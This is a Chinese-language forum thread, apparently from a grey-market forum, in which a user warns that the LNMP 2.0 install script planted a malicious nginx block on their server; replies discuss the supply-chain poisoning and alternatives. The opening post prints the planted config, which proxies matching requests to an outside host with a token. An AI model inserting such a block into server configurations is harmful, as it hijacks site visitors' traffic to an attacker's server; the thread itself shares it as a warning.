全球灰产交流论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

全球云38元起免备案V2EX搬瓦工灰产
SEO查询超级PING网站测速
Virmach特价鸡乌云漏洞吾爱破解
查看: 147|回复: 9

lnmp.org2.0阿里云灰产被跳转代x理

[复制链接]

2

主题

150

回帖

534

积分

高级会员

Rank: 4

积分
534
发表于 2024-7-22 12:23:17 | 显示全部楼层 |阅读模式
20230417
location ~* /.*pkav.* {
    proxy_set_header X-Static-Token "ailunnb666";
    proxy_pass http://hdx.toonb.cc;
    proxy_set_header X-Forwarded-Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header REMOTE-HOST $host;
    proxy_http_version 1.1;

    add_header X-Cache $upstream_cache_status;

    set $static_fileMJrCAYTq 0;
    if ($uri ~* "\.(gif|png|jpg|css|js|woff|woff2)$") {
        set $static_fileMJrCAYTq 1;
        expires 1m;
    }
    if ($static_fileMJrCAYTq = 0) {
        add_header Cache-Control no-cache;
    }
    }
        include enable-php-pathinfo.conf;

        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
        {
            expires      30d;
        }

        location ~ .*\.(js|css)?$
        {
            expires      12h;
        }

        location ~ /.well-known {
            allow all;
        }

        location ~ /\.
        {
            deny all;
        }

        location / {
            return 301 https://$host$request_uri;
        }

        access_log off;
    }各位有相关服务的可以排查下。真是离谱啊
hostloc邀请码购买+tg:@Sendtoae86bot
回复

使用道具 举报

30

主题

2045

回帖

5038

积分

论坛元老

Rank: 8Rank: 8

积分
5038
发表于 2024-7-22 12:42:04 | 显示全部楼层
官网版本?和官方有通讯的就别用了
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

2

主题

150

回帖

534

积分

高级会员

Rank: 4

积分
534
 楼主| 发表于 2024-7-22 12:46:28 | 显示全部楼层
这里找到了一个文件。是多出在安装目录,并执行的,真是**。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

21

主题

913

回帖

2789

积分

金牌会员

Rank: 6Rank: 6

积分
2789
发表于 2024-7-22 12:50:00 | 显示全部楼层
这不是早被放毒了吗,咋还在用,宝塔都比他放心
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

2

主题

150

回帖

534

积分

高级会员

Rank: 4

积分
534
 楼主| 发表于 2024-7-22 12:57:41 | 显示全部楼层
随波逐流 发表于 2024-7-22 12:50
这不是早被放毒了吗,咋还在用,宝塔都比他放心

去年装的,就是懒,然后这个症状还不一样。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

14

主题

570

回帖

1712

积分

金牌会员

Rank: 6Rank: 6

积分
1712
发表于 2024-7-22 12:50:00 | 显示全部楼层
我天翼云盘里有一个lnmp完整包备份文件夹,不知道哪个坏透了了的傻X分享的备份,我转存了,后来发现2.0就是被投毒的版本,那还备份个毛。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

9

主题

1137

回帖

3361

积分

论坛元老

Rank: 8Rank: 8

积分
3361
发表于 2024-7-22 12:59:00 | 显示全部楼层
LNMP 投毒之後我一直再用這個

https://github.com/moeYuiYui/lnmp
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

250

主题

1380

回帖

4512

积分

论坛元老

Rank: 8Rank: 8

积分
4512
发表于 2024-7-22 13:18:24 | 显示全部楼层
不敢用了。。。。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

158

主题

1227

回帖

3968

积分

论坛元老

Rank: 8Rank: 8

积分
3968
发表于 2024-7-22 13:23:12 | 显示全部楼层
jekyll 发表于 2024-7-22 12:59
我天翼云盘里有一个lnmp完整包备份文件夹,不知道哪个坏透了了的傻X分享的备份,我转存了,后来发现2.0就是 ...

干灰产的说1.8及之前的应该没投毒,等大佬测试
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

14

主题

570

回帖

1712

积分

金牌会员

Rank: 6Rank: 6

积分
1712
发表于 2024-7-22 13:35:03 | 显示全部楼层
莆田郑少斌 发表于 2024-7-22 13:35
干灰产的说1.8及之前的应该没投毒,等大佬测试

没用,完全离线编译很难实现,你只要联网,就难免出问题,没时间去审计那么多脚本,除非军哥亲自说明过程中不会从vpser.net或者lnmp.org拉取数据。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

展开

QQ|Archiver|手机版|小黑屋|全球灰产交流论坛

GMT+8, 2024-10-24 12:31 , Processed in 0.045491 second(s), 27 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表